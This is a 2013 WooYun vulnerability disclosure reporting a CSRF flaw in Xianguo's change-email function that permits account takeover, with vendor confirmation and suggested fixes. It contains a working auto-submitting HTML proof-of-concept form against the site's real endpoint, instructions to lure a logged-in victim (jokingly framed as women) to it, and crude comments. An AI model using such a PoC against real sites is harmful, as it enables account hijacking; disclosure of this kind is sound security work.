当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016848

漏洞标题:咦!鲜果网也能重置妹子帐号了

相关厂商:鲜果网

漏洞作者: 风萧萧

提交时间:2013-01-02 21:36

修复时间:2013-02-16 21:37

公开时间:2013-02-16 21:37

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-02: 细节已通知厂商并且等待厂商处理中
2013-01-07: 厂商已经确认,细节仅向厂商公开
2013-01-17: 细节向核心白帽子及相关领域专家公开
2013-01-27: 细节向普通白帽子公开
2013-02-06: 细节向实习白帽子公开
2013-02-16: 细节向公众公开

简要描述:

最近发现这个密码重置的问题是一个通杀漏洞,很多站点都有的!相比其他站点,给鲜果网带来的危害更大哦!

详细说明:

1.我就不先说这个问题是怎么导致的了,看我一步一步操作撒!首先登陆鲜果网:

0.jpg


2.进入【我的设置】,点击【修改邮箱】。这里看好了啊,我是已经绑定了gmail邮箱的!

2.jpg


3.那么填好新的邮箱(我这里使用QQ邮箱作为测试),点击【保存】。这个时候需要设置好浏览器代理,将POST数据包拦截,并构造下面的POC页面:

<html>
<body>
<form id="fengxiaoxiao" name="fengxiaoxiao" action="http://xianguo.com/setting/change-email" method="POST">
<input type="text" name="email_ChgOld" value="********@qq.com" />
<input type="submit" value="submit" />
</form>
<script>
	document.fengxiaoxiao.submit();
</script>
</body>
</html>

漏洞证明:

4.到了上面的步骤,应该知道我是要干啥了吧!哈哈,鲜果网的妹子呢?妹子在哪里!在妹子登陆鲜果网的同时,诱惑她访问上面的POC页面!效果图如下:

3.jpg


5.再看看我的邮箱,哎哟,收到了一封充满诗情画意的邮件!感觉我离妹子好近好近,小心肝扑通扑通的跳啊!

4.jpg


6.点击这个链接吧!我不仅登陆了妹子的账号,而且还绑定了邮箱。看下面两个图:

5.jpg

6.jpg

修复方案:

1.CSRF不设防啊!要注意检查全站哦!
2.在这个问题上和其他网站的区别是:别的网站对于已经绑定的邮箱,首先要先解绑!可通过发送解绑链接到原邮箱、或者通过绑定的手机进行解绑,但是这里什么都没有;
3.关键接口没有做用户验证,比如提示用户首先输入密码才可绑定邮箱或手机,哪怕设置一个图片验证码也可防止这种情况;
4.礼物啊礼物,好久没收到了!能来一个么?

版权声明:转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-01-07 13:07

厂商回复:

年底各种忙~~ @风萧萧 也来送安全礼包了。 感谢感谢, 我们加强验证。 礼物会有的~

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-02 22:10 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。有一个登录没验证码的网站。。

  2. 2013-01-02 22:31 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @px1624 哦,暴力破解么?

  3. 2013-01-02 22:38 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @风萧萧 不知道你咋弄的,我没去看,既然你都提交了,我也就懒得去看了,反正没验证码就很不安全。。。

  4. 2013-01-03 09:16 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    看标题,修得卖萌~

  5. 2013-01-03 09:22 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    既然是很多站点都有 你又可以刷rank勒。

  6. 2013-01-03 10:27 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @疯子 你信不信xsser到时候会要求你一次性把可以搞定的网站地址都发出来,不然不给过,嘎嘎

  7. 2013-01-03 10:30 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @zzR 小王子!求教如何约炮啊!

  8. 2013-01-03 10:48 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @风萧萧 这个问题可以研究,大概是这样的,将右手伸进裤兜,使命的掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏啊掏,掏出手机- -# 打开陌陌、企鹅、啪啪等,设定好对象为男/女(根据个人喜好),然后使命的摇头,方,可成也!

  9. 2013-01-03 10:57 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @zzR 掏的时间太久,湿了

  10. 2013-01-03 10:59 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @疯子 恩啊,普遍不重视啊!

  11. 2013-01-03 10:59 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @px1624 剑总这么坏啊!

  12. 2013-01-04 09:49 | 墨水心_Len ( 实习白帽子 | Rank:70 漏洞数:15 | PKAV技术宅 | 每一个有文化的东西,我们都...)

    咦!才发现wooyun能关注白帽子了。。。

  13. 2013-01-07 14:49 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    禽兽!放开那女孩!

  14. 2015-06-18 22:11 | Zephyrus ( 路人 | Rank:14 漏洞数:7 | 静心学习)

    洞主致力于挖掘妹纸账号啊,求carry,害羞